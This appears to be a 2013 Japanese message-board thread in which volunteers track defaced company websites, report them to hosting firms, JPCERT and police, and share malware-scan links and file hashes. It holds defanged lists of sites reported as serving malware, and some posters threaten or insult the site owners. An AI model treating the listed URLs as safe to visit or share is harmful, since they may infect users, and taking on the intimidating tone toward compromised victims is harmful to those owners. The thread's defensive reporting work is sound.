>>237
C m-filled●com/
対応されていないので電話してみました
業者には対応するよう依頼しているそうですが、何て言うのか(ry
さて、金銭を要求し対応してあげるという電話があったそうですが
私達のスキルはお金を払って習得したものではなく
善意の方が無償で公開&授けてくれたものです
もしかしたら、お亡くなりになった方もいるかもしれません
私達は力を託されたのです
全てを一人の力でやっているのではありませんよ
身に覚えのある香具師さん
調子こいてると追い込み掛けますよw
C m-filled●com/
対応されていないので電話してみました
業者には対応するよう依頼しているそうですが、何て言うのか(ry
さて、金銭を要求し対応してあげるという電話があったそうですが
私達のスキルはお金を払って習得したものではなく
善意の方が無償で公開&授けてくれたものです
もしかしたら、お亡くなりになった方もいるかもしれません
私達は力を託されたのです
全てを一人の力でやっているのではありませんよ
身に覚えのある香具師さん
調子こいてると追い込み掛けますよw
270 :/名無しさん[1-30] ◆.htmlint.U :2013/07/20(土) NY:AN:NY.AN
271 :名無しさん@お腹いっぱい。:2013/07/21(日) NY:AN:NY.AN
belleohtsu●co●jp
featurepics.promos●co●jp
ident-prex●co●jp
featurepics.promos●co●jp
ident-prex●co●jp
272 :名無しさん@お腹いっぱい。:2013/07/21(日) NY:AN:NY.AN
申告しても対応しないサイト
colx●co●jp
bio-pf●co●jp
kyuhaisui●jp/
nanautsuki●lals-inc●com/
invoke●co●jp
arow●co●jp
humans●co●jp
nom-osaka138●co●jp
p-web●co●jp
miura-sports●com
beridansu●catch-the-future●com/cat130/
netjohono1●com/
takarakuji-ataru●com/
e-ibh●com/
coach-take●com/
www●green-w●co●jp/
www●koubegyuu●com/about●html
miidayori●xmiix●com/
colx●co●jp
bio-pf●co●jp
kyuhaisui●jp/
nanautsuki●lals-inc●com/
invoke●co●jp
arow●co●jp
humans●co●jp
nom-osaka138●co●jp
p-web●co●jp
miura-sports●com
beridansu●catch-the-future●com/cat130/
netjohono1●com/
takarakuji-ataru●com/
e-ibh●com/
coach-take●com/
www●green-w●co●jp/
www●koubegyuu●com/about●html
miidayori●xmiix●com/
273 :名無しさん@お腹いっぱい。:2013/07/21(日) NY:AN:NY.AN
>>271,272
全部GMOなんですね…
GMOは嫌いです
とりあえず、>>272M e-ibh●com/
営業していたので電話しました
一応現状404になりましたが…
四次元の住人と話をしている様で
むかつきましたね
全部GMOなんですね…
GMOは嫌いです
とりあえず、>>272M e-ibh●com/
営業していたので電話しました
一応現状404になりましたが…
四次元の住人と話をしている様で
むかつきましたね
274 :名無しさん@お腹いっぱい。:2013/07/21(日) NY:AN:NY.AN
275 :名無しさん@お腹いっぱい。:2013/07/21(日) NY:AN:NY.AN
www.npa.go.jp/cyberpolice/detect/
www.npa.go.jp/cyberpolice/detect/pdf/20130607.pdf
↑
こんなものね、誰も見ないと思うんですね
なので、直接全ISPに注意喚起の連絡を直接警察庁からした上で
更にプロバイダからユーザに対して注意喚起をして貰う様
警察庁に要請してみました
朝日ネットはやったそうなので出来るはず
so-netの件も伝えました
もうね、手に負えなくなる悪寒がするねんw
www.npa.go.jp/cyberpolice/detect/pdf/20130607.pdf
↑
こんなものね、誰も見ないと思うんですね
なので、直接全ISPに注意喚起の連絡を直接警察庁からした上で
更にプロバイダからユーザに対して注意喚起をして貰う様
警察庁に要請してみました
朝日ネットはやったそうなので出来るはず
so-netの件も伝えました
もうね、手に負えなくなる悪寒がするねんw
276 :名無しさん@お腹いっぱい。:2013/07/21(日) NY:AN:NY.AN
277 :/名無しさん[1-30] ◆.htmlint.U :2013/07/23(火) NY:AN:NY.AN
>>275
お疲れ様です
> 注意喚起
Domain登録業者にも通達してそのユーザー向けにもしてほすぃ
鯖が海外業者だとちょいメンドイ
Domain登録業、代行業は我関せずの姿勢が多いのは間違ってる
あと上流のISPの中にも下流に関して手を触れないのがあるのは困りもの
危険なサイトなのでつーほーめるそのものがフィルタリングされちゃうんだから
受け取ったら責任を持って下流にも伝えるべっきー
>>276
お疲れ様ですお疲れ様です
お疲れ様です
> 注意喚起
Domain登録業者にも通達してそのユーザー向けにもしてほすぃ
鯖が海外業者だとちょいメンドイ
Domain登録業、代行業は我関せずの姿勢が多いのは間違ってる
あと上流のISPの中にも下流に関して手を触れないのがあるのは困りもの
危険なサイトなのでつーほーめるそのものがフィルタリングされちゃうんだから
受け取ったら責任を持って下流にも伝えるべっきー
>>276
お疲れ様ですお疲れ様です
278 :/名無しさん[1-30] ◆.htmlint.U :2013/07/24(水) NY:AN:NY.AN
にゃんと……
http://kohada.2ch.net/test/read.cgi/sec/1370942055/47 からん
OCN 400万人の会員情報流出か
http://hayabusa3.2ch.net/test/read.cgi/news/1374671659/
http://www3.nhk.or.jp/news/html/20130724/k10013271121000.html
【速報】「OCN ID」に不正アクセス 最大で約400万人のメールアドレスとパスワード盗難か
http://hayabusa3.2ch.net/test/read.cgi/news/1374671630/
http://news.livedoor.com/article/detail/7890046/
OCN IDサーバーへ外部から不正アクセス 最大400万のIDと暗号化パスの流出の可能性
http://engawa.2ch.net/test/read.cgi/poverty/1374663426/
http://www.ntt.com/release/monthNEWS/detail/20130724.html
http://kohada.2ch.net/test/read.cgi/sec/1370942055/47 からん
OCN 400万人の会員情報流出か
http://hayabusa3.2ch.net/test/read.cgi/news/1374671659/
http://www3.nhk.or.jp/news/html/20130724/k10013271121000.html
【速報】「OCN ID」に不正アクセス 最大で約400万人のメールアドレスとパスワード盗難か
http://hayabusa3.2ch.net/test/read.cgi/news/1374671630/
http://news.livedoor.com/article/detail/7890046/
OCN IDサーバーへ外部から不正アクセス 最大400万のIDと暗号化パスの流出の可能性
http://engawa.2ch.net/test/read.cgi/poverty/1374663426/
http://www.ntt.com/release/monthNEWS/detail/20130724.html
イベントセミナー情報 緊急開催!【開催日時】2013/08/06 14:30〜16:00(受付開始14:15)
jp.trendmicro.com/jp/events/detail/20130717001103.html
「90分でわかる、多発するWeb改ざん事件と、なりすまし不正ログイン、
脆弱性悪用による情報漏えい事件の解説と対策」
jp.trendmicro.com/jp/events/detail/20130717001103.html
「90分でわかる、多発するWeb改ざん事件と、なりすまし不正ログイン、
脆弱性悪用による情報漏えい事件の解説と対策」
280 :/名無しさん[1-30] ◆.htmlint.U :2013/08/05(月) NY:AN:NY.AN
IPA 独立行政法人 情報処理推進機構:2013年8月の呼びかけ
http://www.ipa.go.jp/security/txt/2013/08outline.html
http://www.ipa.go.jp/security/txt/2013/08outline.html
281 :/名無しさん[1-30] ◆.htmlint.U :2013/08/07(水) NY:AN:NY.AN
CMSの脆弱性を悪用するスパムボット「Stealrat」による感染を確認するには? | トレンドマイクロ セキュリティ ブログ (ウイルス解析担当者による Trend Micro Security Blog)
http://blog.trendmicro.co.jp/archives/7662
http://blog.trendmicro.co.jp/archives/7662
282 :名無しさん@お腹いっぱい。:2013/08/09(金) NY:AN:NY.AN
GMOもだめですねー
bio-pf●co●jp
kyuhaisui●jp/
humans●co●jp 配下のページ
p-web●co●jp
takarakuji-ataru●com/
coach-take●com/
bio-pf●co●jp
kyuhaisui●jp/
humans●co●jp 配下のページ
p-web●co●jp
takarakuji-ataru●com/
coach-take●com/
283 :/名無しさん[1-30] ◆.htmlint.U :2013/08/09(金) NY:AN:NY.AN
284 :名無しさん@お腹いっぱい。:2013/08/10(土) NY:AN:NY.AN
何度申告しても対処しないサイト
crystalj●co●jp/ canonet
n-washington●co●jp/ canonet
pazuru●co●jp/ canonet
saitokoumuten●co●jp/ canonet
officekens●co●jp/ CPI
nakamura-kogyo●co●jp/ CSIDENET
belleohtsu●co●jp/ GMO
chemi-cal●co●jp/ GMO
generic-shinnei●co●jp/ GMO
jamsoftware●co●jp/ GMO
ayabekikou●co●jp/ NTTPC
popup●co●jp/ NTT-PC
fujiken2464●co●jp/ OCN
gysekkei●co●jp/ ride
crystalj●co●jp/ canonet
n-washington●co●jp/ canonet
pazuru●co●jp/ canonet
saitokoumuten●co●jp/ canonet
officekens●co●jp/ CPI
nakamura-kogyo●co●jp/ CSIDENET
belleohtsu●co●jp/ GMO
chemi-cal●co●jp/ GMO
generic-shinnei●co●jp/ GMO
jamsoftware●co●jp/ GMO
ayabekikou●co●jp/ NTTPC
popup●co●jp/ NTT-PC
fujiken2464●co●jp/ OCN
gysekkei●co●jp/ ride
285 :名無しさん@お腹いっぱい。:2013/08/10(土) NY:AN:NY.AN
neurosystem●co●jp/kozukai/ sakura
life-ac●co●jp/ smileserver
issaku●co●jp/zen_issaku/shinosaka/ vectant
foods-dream●co●jp/ Verio
eight-s●co●jp/ デジロック
nabeya-zakka●co●jp/file/slideshow/ ファーストサーバー
ishiko●co●jp/ 大塚商会
ishitabi●co●jp/ 大塚商会
life-ac●co●jp/ smileserver
issaku●co●jp/zen_issaku/shinosaka/ vectant
foods-dream●co●jp/ Verio
eight-s●co●jp/ デジロック
nabeya-zakka●co●jp/file/slideshow/ ファーストサーバー
ishiko●co●jp/ 大塚商会
ishitabi●co●jp/ 大塚商会
286 :名無しさん@お腹いっぱい。:2013/08/10(土) NY:AN:NY.AN
>>282
@ bio-pf●co●jp >>272A
A kyuhaisui●jp/ >>272B
B humans●co●jp 配下のページ >>272F
C p-web●co●jp >>272H
D takarakuji-ataru●com/ >>272L
E coach-take●com/ >>272N
>>283
乙ですー
GMOからのメールによれば現在進行形であり対応完了してはいない旨の認識はあるようなので生温かく見守ってあげてください
>>284
@鯖が見つかりません(対応済のもより)
A休日のもよりなので営業日に凸予定
B現在凸中
@ bio-pf●co●jp >>272A
A kyuhaisui●jp/ >>272B
B humans●co●jp 配下のページ >>272F
C p-web●co●jp >>272H
D takarakuji-ataru●com/ >>272L
E coach-take●com/ >>272N
>>283
乙ですー
GMOからのメールによれば現在進行形であり対応完了してはいない旨の認識はあるようなので生温かく見守ってあげてください
>>284
@鯖が見つかりません(対応済のもより)
A休日のもよりなので営業日に凸予定
B現在凸中
287 :オルティス・ジャパン:2013/08/10(土) NY:AN:NY.AN
CANONET は8/10〜8/18までお休みなのでw
>>284Dofficekens●co●jp/
>KEN'Sは、業務サポート専門会社です
笑わせるんじゃありませんよ
把握してるから、対応中だから何だというのでしょうね
偉そうな物言いや電話を切るような輩はクタバレばいいと思いますね
本当に対応してるなら、そんなもの3秒で完了するっしょw
>>284Dofficekens●co●jp/
>KEN'Sは、業務サポート専門会社です
笑わせるんじゃありませんよ
把握してるから、対応中だから何だというのでしょうね
偉そうな物言いや電話を切るような輩はクタバレばいいと思いますね
本当に対応してるなら、そんなもの3秒で完了するっしょw
288 :名無しさん@お腹いっぱい。:2013/08/10(土) NY:AN:NY.AN
お盆が明けるまでは打つ手がないもよりですが
この状況でどうするかを思案するのもまた一興w
この状況でどうするかを思案するのもまた一興w
289 :名無しさん@お腹いっぱい。:2013/08/10(土) NY:AN:NY.AN
ググって踏んでも真っ白だったり開かないのはこれのせいだったのか
290 :名無しさん@お腹いっぱい。:2013/08/10(土) NY:AN:NY.AN
291 :オルティス・ジャパン:2013/08/10(土) NY:AN:NY.AN
>>284-285
【努力】の「ど」作戦終了
明日からゆるゆると&
お盆明け以降は通常フローでガンガル
>>286の>>284Bpazuru●co●jp/
情報だけ貰って閉鎖をしておきながら
当店は元々HPを持ってないとぶっこきくさって
更に警察に通報しくさった馬鹿女&店長
お前達には天罰が下るはず…といっておきますよんw
【努力】の「ど」作戦終了
明日からゆるゆると&
お盆明け以降は通常フローでガンガル
>>286の>>284Bpazuru●co●jp/
情報だけ貰って閉鎖をしておきながら
当店は元々HPを持ってないとぶっこきくさって
更に警察に通報しくさった馬鹿女&店長
お前達には天罰が下るはず…といっておきますよんw
292 :オルティス・ジャパン:2013/08/10(土) NY:AN:NY.AN
>>291
間違えたので訂正です
>>286の>>284Bpazuru●co●jp/ ← 間違えたので訂正し謝罪いたします
>>285Enabeya-zakka●co●jp/file/slideshow/ ← こっちでした
間違えたので訂正です
>>286の>>284Bpazuru●co●jp/ ← 間違えたので訂正し謝罪いたします
>>285Enabeya-zakka●co●jp/file/slideshow/ ← こっちでした
293 :名無しさん@お腹いっぱい。:2013/08/10(土) NY:AN:NY.AN
疲れてるなら休もうそうしよう
294 :名無しさん@お腹いっぱい。:2013/08/11(日) NY:AN:NY.AN
自分は大体レンタル元に直接連絡するわ
サイト管理者で対応できる人もいるけどそうじゃない場合非常にめんどいし
レンタル元なら安全第一でサイト停止等の行動をしてくれる
レンタル元がダメなときはJPCERTに投げちゃう
サイト管理者で対応できる人もいるけどそうじゃない場合非常にめんどいし
レンタル元なら安全第一でサイト停止等の行動をしてくれる
レンタル元がダメなときはJPCERTに投げちゃう
295 :名無しさん@お腹いっぱい。:2013/08/11(日) NY:AN:NY.AN
d
296 :/名無しさん[1-30] ◆.htmlint.U :2013/08/11(日) NY:AN:NY.AN
っ http://megalodon.jp/2013-0811-0227-19/https://www.virustotal.com:443/en/ip-address/164.46.131.23/information/
とりあえず雲で有名になったとことかにメル発射
( ゚Д゚) ネムヒー
saitoadobaizanobaguyaroooooooooo
> ERROR:変なホスト規制中!
><;
とりあえず雲で有名になったとことかにメル発射
( ゚Д゚) ネムヒー
saitoadobaizanobaguyaroooooooooo
> ERROR:変なホスト規制中!
><;
297 :名無しさん@お腹いっぱい。:2013/08/11(日) NY:AN:NY.AN
▼GMO CLOUD
www●tokyo-suidouya●jp/
zero-edit●com/
ips●vc/
kyuhaisui●jp/
belleohtsu●co●jp/
bio-pf●co●jp
www●tokyo-suidouya●jp/
zero-edit●com/
ips●vc/
kyuhaisui●jp/
belleohtsu●co●jp/
bio-pf●co●jp
298 :名無しさん@お腹いっぱい。:2013/08/11(日) NY:AN:NY.AN
299 :オルティス・ジャパン:2013/08/11(日) NY:AN:NY.AN
>>297
お盆明け以降に
>>285Enabeya-zakka●co●jp/file/slideshow/
証拠隠滅したつもりのなべやさん
当店は元々HPを持ってないと主張したなべやさん
↓これはなんでしょw
http://www.aguse.jp/?url=http://www.nabeya-zakka.co.jp/mob.htm
www●nabeya-zakka●co●jp/i/index●htm
>>298
ヤホー(^0^)/
お盆明け以降に
>>285Enabeya-zakka●co●jp/file/slideshow/
証拠隠滅したつもりのなべやさん
当店は元々HPを持ってないと主張したなべやさん
↓これはなんでしょw
http://www.aguse.jp/?url=http://www.nabeya-zakka.co.jp/mob.htm
www●nabeya-zakka●co●jp/i/index●htm
>>298
ヤホー(^0^)/
300 :オルティス・ジャパン:2013/08/11(日) NY:AN:NY.AN
なべやさん
お前達が頼みの綱の中原警察は、今日乗り込んで完全にしめてきましたよんw
お前達が頼みの綱の中原警察は、今日乗り込んで完全にしめてきましたよんw
301 :/名無しさん[1-30] ◆.htmlint.U :2013/08/12(月) NY:AN:NY.AN
ファイルは昼頃404になったん>>296
この頃は正常だったみたい
http://ikura.2ch.net/test/read.cgi/jfoods/1070740162/68
>>299-300
お疲れ様です
この頃は正常だったみたい
http://ikura.2ch.net/test/read.cgi/jfoods/1070740162/68
>>299-300
お疲れ様です
302 :名無しさん@お腹いっぱい。:2013/08/12(月) NY:AN:NY.AN
いろいろと腹の立つことや納得できないこともありますが
修正されたり閉鎖されたりすることは、対応完了であり
勝利…
なのではありまっするまっするw
修正されたり閉鎖されたりすることは、対応完了であり
勝利…
なのではありまっするまっするw
303 :名無しさん@お腹いっぱい。:2013/08/12(月) NY:AN:NY.AN
神奈川県警なのが不安要素
304 :/名無しさん[1-30] ◆.htmlint.U :2013/08/15(木) NY:AN:NY.AN
フロリダ州の退役軍人のサイトが盛大にやられてるん
正常
ソース
http://megalodon.jp/2013-0815-2338-34/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Ffloridavets%2Eorg%2F%3Fpage%5Fid%3D217
http://megalodon.jp/2013-0815-2355-26/rd.or.tl/get.php?site=http%3A%2F%2Ffloridavets%2Eorg%2F%3Fpage%5Fid%3D217&act=view
スクショ
http://megalodon.jp/2013-0815-2345-02/gw.aguse.jp/?aguse_url=http%3A%2F%2Ffloridavets.org%2F%3Fpage_id%3D217
ぁぅぁぅ
ソース
http://megalodon.jp/2013-0815-2340-40/rd.or.tl/get.php?site=http%3A%2F%2Ffloridavets%2Eorg%2F%3Fpage%5Fid%3D217&act=view&ua-freetext=google&ua=textbox
スクショ
http://megalodon.jp/2013-0815-2343-13/gw.aguse.jp/?aguse_url=http%3A%2F%2Fwww%2Egoogle%2Eco%2Ejp%2Fgwt%2Fn%3Fu%3Dhttp%253A%252F%252Ffloridavets%252Eorg%252F%253Fpage%255Fid%253D217
google…… 恐ろしい子。
正常
ソース
http://megalodon.jp/2013-0815-2338-34/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Ffloridavets%2Eorg%2F%3Fpage%5Fid%3D217
http://megalodon.jp/2013-0815-2355-26/rd.or.tl/get.php?site=http%3A%2F%2Ffloridavets%2Eorg%2F%3Fpage%5Fid%3D217&act=view
スクショ
http://megalodon.jp/2013-0815-2345-02/gw.aguse.jp/?aguse_url=http%3A%2F%2Ffloridavets.org%2F%3Fpage_id%3D217
ぁぅぁぅ
ソース
http://megalodon.jp/2013-0815-2340-40/rd.or.tl/get.php?site=http%3A%2F%2Ffloridavets%2Eorg%2F%3Fpage%5Fid%3D217&act=view&ua-freetext=google&ua=textbox
スクショ
http://megalodon.jp/2013-0815-2343-13/gw.aguse.jp/?aguse_url=http%3A%2F%2Fwww%2Egoogle%2Eco%2Ejp%2Fgwt%2Fn%3Fu%3Dhttp%253A%252F%252Ffloridavets%252Eorg%252F%253Fpage%255Fid%253D217
google…… 恐ろしい子。
305 :名無しさん@お腹いっぱい。:2013/08/16(金) NY:AN:NY.AN
みんなどうやって改竄されてるサイトを見つけてくることができるんだ?
俺ができる対策はテンプレとUrl.Voidやvirus totalで調べることくらいだけど
俺ができる対策はテンプレとUrl.Voidやvirus totalで調べることくらいだけど
306 :/名無しさん[1-30] ◆.htmlint.U :2013/08/16(金) NY:AN:NY.AN
さて、どうしたものか。
DQpodHRwOi8vbWVnYWxvZG9uLmpwLzIwMTMtMDgxNi0yMzI3LTAxL2d3LmFndXNlLmpwLz9hZ3Vz
ZV91cmw9aHR0cCUzQSUyRiUyRnd3dyUyRXNpdGVhZHZpc29yJTJFY29tJTJGc2l0ZXMlMkZodHRw
JTI1M0ElMjUyRiUyNTJGaWNoaWd1JTI1MkVtZW1vcGFkJTI1MkVvcmclMjUyRmluZGV4JTI1MkVo
dG0NCg==
>>305
ぐぐる
DQpodHRwOi8vbWVnYWxvZG9uLmpwLzIwMTMtMDgxNi0yMzI3LTAxL2d3LmFndXNlLmpwLz9hZ3Vz
ZV91cmw9aHR0cCUzQSUyRiUyRnd3dyUyRXNpdGVhZHZpc29yJTJFY29tJTJGc2l0ZXMlMkZodHRw
JTI1M0ElMjUyRiUyNTJGaWNoaWd1JTI1MkVtZW1vcGFkJTI1MkVvcmclMjUyRmluZGV4JTI1MkVo
dG0NCg==
>>305
ぐぐる
307 :名無しさん@お腹いっぱい。:2013/08/17(土) NY:AN:NY.AN
308 :/名無しさん[1-30] ◆.htmlint.U :2013/08/17(土) NY:AN:NY.AN
以前はやほーさーちがダントツだった。
余りにも高性能すぎて、使うのに躊躇すたん。
今は孫やほーはぐぐる、本国※やほーはびーいんぐになったけど
それぞれ元となった検索サービスにはあったせーふぶらうじんぐ(警告)が無くて一般人が使うには(ry
ぐぐる
> このサイトはコンピュータに損害を与える可能性があります。
びーいんぐ
> コンピューターに被害を与えるおそれのある、悪意のあるソフトウェアがダウンロードされる可能性があるため、このサイトへのリンクが無効になりました。
余りにも高性能すぎて、使うのに躊躇すたん。
今は孫やほーはぐぐる、本国※やほーはびーいんぐになったけど
それぞれ元となった検索サービスにはあったせーふぶらうじんぐ(警告)が無くて一般人が使うには(ry
ぐぐる
> このサイトはコンピュータに損害を与える可能性があります。
びーいんぐ
> コンピューターに被害を与えるおそれのある、悪意のあるソフトウェアがダウンロードされる可能性があるため、このサイトへのリンクが無効になりました。
309 :/名無しさん[1-30] ◆.htmlint.U :2013/08/17(土) NY:AN:NY.AN
あと、このスレ1から読むとそのものずばりのがあるよん
200レスぐらい読もー
200レスぐらい読もー
310 :名無しさん@お腹いっぱい。:2013/08/17(土) NY:AN:NY.AN
NTTPC
jisyubo●co●jp/
sign-s●co●jp/
stork●co●jp/t_sakuraba/album/
tokiwakaigo●co●jp/
vtc●co●jp/seminer/china_tettai/
jisyubo●co●jp/
sign-s●co●jp/
stork●co●jp/t_sakuraba/album/
tokiwakaigo●co●jp/
vtc●co●jp/seminer/china_tettai/
311 :名無しさん@お腹いっぱい。:2013/08/17(土) NY:AN:NY.AN
312 :名無しさん@お腹いっぱい。:2013/08/17(土) NY:AN:NY.AN
グーグルさんは確かに危険サイトに良く反応するけど
脅威がないサイトも良く検出する(いわゆる誤反応)
脅威がないサイトも良く検出する(いわゆる誤反応)
313 :名無しさん@お腹いっぱい。:2013/08/17(土) NY:AN:NY.AN
▼canonet
shinko-engineer●co●jp/
shouwa-lab●co●jp/
straightword●co●jp/
▼CPI
re-media●co●jp/user/trust_onoda/
seiwa-trading●co●jp/
stylecars●co●jp/
▼GMO
hinokilab●co●jp/
ten-on●co●jp/
wakana-fc●co●jp/
shinko-engineer●co●jp/
shouwa-lab●co●jp/
straightword●co●jp/
▼CPI
re-media●co●jp/user/trust_onoda/
seiwa-trading●co●jp/
stylecars●co●jp/
▼GMO
hinokilab●co●jp/
ten-on●co●jp/
wakana-fc●co●jp/
314 :名無しさん@お腹いっぱい。:2013/08/17(土) NY:AN:NY.AN
▼GMOcloud
ach●co●jp/
shin-ei-net●co●jp/ 配下のページ全て
sigakuin●co●jp/ 配下のページ全て
wakaki●co●jp/
▼inforyoma
www●e-tokushima●co●jp/vw/ 配下のページ
▼Joe'sウェブホスティング
www●abe-auto●co●jp/
www●aizen-p●co●jp/recruit/
wingfoot●co●jp/ 配下のページ全て
takarabe-hrj●co●jp/clock/
takarabe-hrj●co●jp/images/
sunfoods-o●co●jp/
ach●co●jp/
shin-ei-net●co●jp/ 配下のページ全て
sigakuin●co●jp/ 配下のページ全て
wakaki●co●jp/
▼inforyoma
www●e-tokushima●co●jp/vw/ 配下のページ
▼Joe'sウェブホスティング
www●abe-auto●co●jp/
www●aizen-p●co●jp/recruit/
wingfoot●co●jp/ 配下のページ全て
takarabe-hrj●co●jp/clock/
takarabe-hrj●co●jp/images/
sunfoods-o●co●jp/
315 :名無しさん@お腹いっぱい。:2013/08/17(土) NY:AN:NY.AN
▼LOLIPOP
negizen●co●jp/
shintendo●co●jp/
▼Nifty
fujii-kensetsu●co●jp/
▼vectant
issaku●co●jp/zen_issaku/shinosaka/
negizen●co●jp/
shintendo●co●jp/
▼Nifty
fujii-kensetsu●co●jp/
▼vectant
issaku●co●jp/zen_issaku/shinosaka/
316 :オルティス・ジャパン:2013/08/19(月) NY:AN:NY.AN
▼canonet
>>284@ABC
>>313@AB
0367327573に連絡(すでに対応済のところもありましたが)
メアドを聞き出しました
[email protected]
今回はjpサート経由で既に連絡があったそうです
jpサートに連絡した方乙です
多分他のところにも連絡したんじゃないのかなと思われるので
他の残権は連絡済とみなし様子見とします
>>284@ABC
>>313@AB
0367327573に連絡(すでに対応済のところもありましたが)
メアドを聞き出しました
[email protected]
今回はjpサート経由で既に連絡があったそうです
jpサートに連絡した方乙です
多分他のところにも連絡したんじゃないのかなと思われるので
他の残権は連絡済とみなし様子見とします
317 :/名無しさん[1-30] ◆.htmlint.U :2013/08/20(火) NY:AN:NY.AN
お疲れ様です。
>>168,181,183-184,306 JPCERT : CodeName : COLOR #d68107
Wepawet http://wepawet.cs.ucsb.edu/view.php?hash=73bd268a264f33a9b9e1d2329195b598&t=1376999711&type=js
urlQuery http://urlquery.net/report.php?id=4640111
aguseGATEWAY http://megalodon.jp/2013-0820-2114-56/gw.aguse.jp/?aguse_url=http%3A%2F%2Fichigu%2Ememopad%2Eorg%2Findex%2Ehtm
VIRUSTOTAL
https://www.virustotal.com/en/url/e2c1f014719be0ac0e95afe7c61e657e68fc4aa7766c7f85c938efe587617f6d/analysis/1377001053/
Detection ratio: 10 / 39
Analysis date: 2013-08-20 12:17:33 UTC
Additional information
last-modified: Mon, 19 Aug 2013 10:07:53 GMT
Response content SHA-256
ea1111b0e6e54c498633c99e95ebb9aea4eb9f2f3810feee92e86de1f70f6058
https://www.virustotal.com/en/file/ea1111b0e6e54c498633c99e95ebb9aea4eb9f2f3810feee92e86de1f70f6058/analysis/1377001013/
SHA256: ea1111b0e6e54c498633c99e95ebb9aea4eb9f2f3810feee92e86de1f70f6058
SHA1: 0d51cc0372565fb485f832439595f9117b4ddd46
MD5: 8b28c0e8d3da4893926a0796e6e946ec
File size: 13.1 KB ( 13436 bytes )
File name: index.htm
File type: HTML
Detection ratio: 7 / 45
Analysis date: 2013-08-20 12:16:53 UTC
検体送付かんりょ さいとあどばいざはまだだお
「d68107」は初見?
https://twitter.com/jpcert_ac/status/345343485387345920
https://pbs.twimg.com/media/BMroEfxCEAID-K-.png
>>168,181,183-184,306 JPCERT : CodeName : COLOR #d68107
Wepawet http://wepawet.cs.ucsb.edu/view.php?hash=73bd268a264f33a9b9e1d2329195b598&t=1376999711&type=js
urlQuery http://urlquery.net/report.php?id=4640111
aguseGATEWAY http://megalodon.jp/2013-0820-2114-56/gw.aguse.jp/?aguse_url=http%3A%2F%2Fichigu%2Ememopad%2Eorg%2Findex%2Ehtm
VIRUSTOTAL
https://www.virustotal.com/en/url/e2c1f014719be0ac0e95afe7c61e657e68fc4aa7766c7f85c938efe587617f6d/analysis/1377001053/
Detection ratio: 10 / 39
Analysis date: 2013-08-20 12:17:33 UTC
Additional information
last-modified: Mon, 19 Aug 2013 10:07:53 GMT
Response content SHA-256
ea1111b0e6e54c498633c99e95ebb9aea4eb9f2f3810feee92e86de1f70f6058
https://www.virustotal.com/en/file/ea1111b0e6e54c498633c99e95ebb9aea4eb9f2f3810feee92e86de1f70f6058/analysis/1377001013/
SHA256: ea1111b0e6e54c498633c99e95ebb9aea4eb9f2f3810feee92e86de1f70f6058
SHA1: 0d51cc0372565fb485f832439595f9117b4ddd46
MD5: 8b28c0e8d3da4893926a0796e6e946ec
File size: 13.1 KB ( 13436 bytes )
File name: index.htm
File type: HTML
Detection ratio: 7 / 45
Analysis date: 2013-08-20 12:16:53 UTC
検体送付かんりょ さいとあどばいざはまだだお
「d68107」は初見?
https://twitter.com/jpcert_ac/status/345343485387345920
https://pbs.twimg.com/media/BMroEfxCEAID-K-.png
318 :オルティス・ジャパン:2013/08/25(日) NY:AN:NY.AN
情報搾取を狙う「Web改ざん+不正ログイン+詐欺」の連鎖攻撃が顕著に-2013年08月19日
http://www.itmedia.co.jp/enterprise/articles/1308/19/news105.html
>>314Dwww●e-tokushima●co●jp/vw/に何気に聞いてみたのですが
OS:Windows 7
ソフトウェア;最新に更新
セキュリティソフト:ウイルスバスター(最新に更新)
さて、この環境で何故web改ざんされるのでしょうね
警視庁サイバー犯罪対策課に>>314Dに事実確認をした上で
トレンドマイクロに対して、さりげなく詰問するよう要請しておきましたw
http://www.itmedia.co.jp/enterprise/articles/1308/19/news105.html
>>314Dwww●e-tokushima●co●jp/vw/に何気に聞いてみたのですが
OS:Windows 7
ソフトウェア;最新に更新
セキュリティソフト:ウイルスバスター(最新に更新)
さて、この環境で何故web改ざんされるのでしょうね
警視庁サイバー犯罪対策課に>>314Dに事実確認をした上で
トレンドマイクロに対して、さりげなく詰問するよう要請しておきましたw
319 :名無しさん@お腹いっぱい。:2013/08/26(月) NY:AN:NY.AN
てすと
320 :/名無しさん[1-30] ◆.htmlXG20g :2013/08/29(木) NY:AN:NY.AN
めも
http://www.landerblue.co.jp/blog/?p=8402
http://ja.forums.wordpress.org/topic/24503
http://ja.forums.wordpress.org/topic/24503/page/2
これ関係か >>16
共有鯖の場合CMSのバージョン上げても、同居人がバージョン上げてなかったら改竄被害に巻き込まれてしまうでFA?
http://www.landerblue.co.jp/blog/?p=8402
http://ja.forums.wordpress.org/topic/24503
http://ja.forums.wordpress.org/topic/24503/page/2
これ関係か >>16
共有鯖の場合CMSのバージョン上げても、同居人がバージョン上げてなかったら改竄被害に巻き込まれてしまうでFA?
321 :/名無しさん[1-30] ◆.htmlXG20g :2013/08/29(木) NY:AN:NY.AN
>>320
当社サービス「ロリポップ!レンタルサーバー」ユーザーサイトへの第三者による大規模攻撃について / 新着情報 / お知らせ - レンタルサーバーならロリポップ!
http://lolipop.jp/info/news/4149/
当社サービス「ロリポップ!レンタルサーバー」ユーザーサイトへの第三者による大規模攻撃について / 新着情報 / お知らせ - レンタルサーバーならロリポップ!
http://lolipop.jp/info/news/4149/
322 :/名無しさん[1-30] ◆.htmlXG20g :2013/09/02(月) 04:22:22.12
323 :/名無しさん[1-30] ◆.htmlXG20g :2013/09/02(月) 19:20:36.59
復帰カキコ
324 :名無しさん@お腹いっぱい。:2013/09/04(水) 23:51:39.69
ロリポップ!への大規模攻撃 〜 そういやPHPでtelnetモドキやるプログラムがあってね 〜
http://kohada.2ch.net/test/read.cgi/pcnews/1377980797/
【チカッパ】ロリポップ (lolipop)41【プラン追加】
http://toro.2ch.net/test/read.cgi/hosting/1377869840/
http://kohada.2ch.net/test/read.cgi/pcnews/1377980797/
【チカッパ】ロリポップ (lolipop)41【プラン追加】
http://toro.2ch.net/test/read.cgi/hosting/1377869840/
325 :/名無しさん[1-30] ◆.htmlXG20g :2013/09/06(金) 01:20:53.33
ウイルス撒き散らしているとこ以外にも、偽造医薬品販売の踏み台になっているとこが多いの
日本共産党柏原市会議員団
http://www.siteadvisor.com/sites/msgpage/%6a%63%70%2d%6b%61%73%69%77%61%72%61%2e%6f%72%67
三度目のつーほーすた
今回もスルーなぬかようか
>>324
オツデス
こりは……
日本共産党柏原市会議員団
http://www.siteadvisor.com/sites/msgpage/%6a%63%70%2d%6b%61%73%69%77%61%72%61%2e%6f%72%67
三度目のつーほーすた
